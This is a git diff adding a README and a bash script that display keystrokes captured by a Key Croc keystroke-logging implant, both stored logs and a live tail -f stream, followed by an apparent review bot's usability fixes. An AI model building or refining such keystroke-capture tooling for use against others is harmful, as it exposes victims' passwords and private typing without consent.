-11{G;s/\n\S+//} +- 11{G;s/\n\S+//} 11{..} executes the commands between the ellipses on the eleventh line of config.txt. G append the contents of hold space to the pattern space using a newline as a separator. diff --git a/payloads/library/general/Croc_Live/README.md b/payloads/library/general/Croc_Live/README.md new file mode 100644 index 0000000..89320fe --- /dev/null +++ b/payloads/library/general/Croc_Live/README.md 
@@ -0,0 +1,29 @@
+# Croc_Live
+
+Script Description: Keyboard Activity Monitor
+
+The following script serves as a tool to monitor and display keyboard activity, showing both previous keystrokes and live keystrokes in real-time. It operates in the terminal environment and relies on the presence of certain log files.
+
+- Display Previous Keystrokes:
+ - The script initiates by printing a message to the terminal, indicating that the previously recorded keystrokes are about to be displayed.
+ - It then searches for files named "croc_char.log" within the current directory and its subdirectories.
+ - All found log files are concatenated and their contents are displayed, revealing the previous keystrokes recorded in those files.
+
+- Waiting for Keyboard Activity:
+ - After displaying the previous keystrokes, the script enters a loop, continuously checking for the existence of the file "loot/croc_char.log".
+ - During this loop, it prints the message "Waiting for keyboard activity" and clears the line with each iteration. This creates an interactive waiting experience for users until keyboard activity is detected.
+
+- Show Live Keystrokes:
+ - Once the file "loot/croc_char.log" is present (indicating keyboard activity has started), the script proceeds.
+ - A 1-second pause occurs to allow time for the system to update or log any new keyboard activity.
+ - The terminal screen is then cleared to prepare for the display of live keystrokes.
+ - A message is shown to inform users that live keystrokes will be displayed.
+ - The script uses the tail -f command, which continuously follows and outputs new content appended to the "loot/croc_char.log" file. This effectively presents live keystrokes in real-time.
+
+- Usage:
+
+Place the croc_live.sh file in keycroc tools folder.
+
+To utilize this script, simply execute it in the terminal environment. Make sure that the required log files, specifically "croc_char.log" and "loot/croc_char.log," are available and accessible within the current directory. Simply type "bash udisk/tools/croc_live.sh" in terminal.
+
+Please note that this script may have specific use cases, such as monitoring and capturing keyboard activity during specific sessions or tasks. Always ensure you have the necessary permissions to read and access the log files being monitored.
diff --git a/payloads/library/general/Croc_Live/croc_live.sh b/payloads/library/general/Croc_Live/croc_live.sh
new file mode 100644
index 0000000..6a0a14c
--- /dev/null
+++ b/payloads/library/general/Croc_Live/croc_live.sh
@@ -0,0 +1,19 @@
+#!/bin/bash
+
+# Title: Croc_Live
+# Description: Live keystrokes in real-time. It operates in the terminal environment ( bash udisk/tools/croc_live.sh )
+# Author: spywill
+# Version: 1.0
+# Category: Key Croc
+
+echo -ne "\n\nPrevious keystrokes:\n\n"
+find . -type f -name "croc_char.log" -exec cat {} +
+
+until [ -f loot/croc_char.log ]; do
+ echo -ne "Waiting for keyboard activity\033[0K\r"
+done
+sleep 1
+printf '\033[H\033[2J'
+
+echo -ne "\n\nLive keystrokes:\n\n"
+tail -f loot/croc_char.log
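Review bot: The `until [ -f loot/croc_char.log ]; do` loop in croc_live.sh has no delay, so it spins at full CPU re-printing the waiting message until the first keystroke is logged; add `sleep 1` inside the loop body after the `echo -ne` line. The two paths are also inconsistent: `find .` is rooted at whatever the current directory is, while the wait and `tail -f` use the fixed relative path `loot/croc_char.log`, so the script only behaves as described from the one working directory the README implies (`bash udisk/tools/croc_live.sh`); consider resolving both from `$(dirname "$0")` or accepting the log path as `$1`, and state the expected working directory in the header comment, e.g. `# Run from the directory that contains loot/ (see README)`. The `tail -f` also never exits, so the header should say the script is stopped with Ctrl-C.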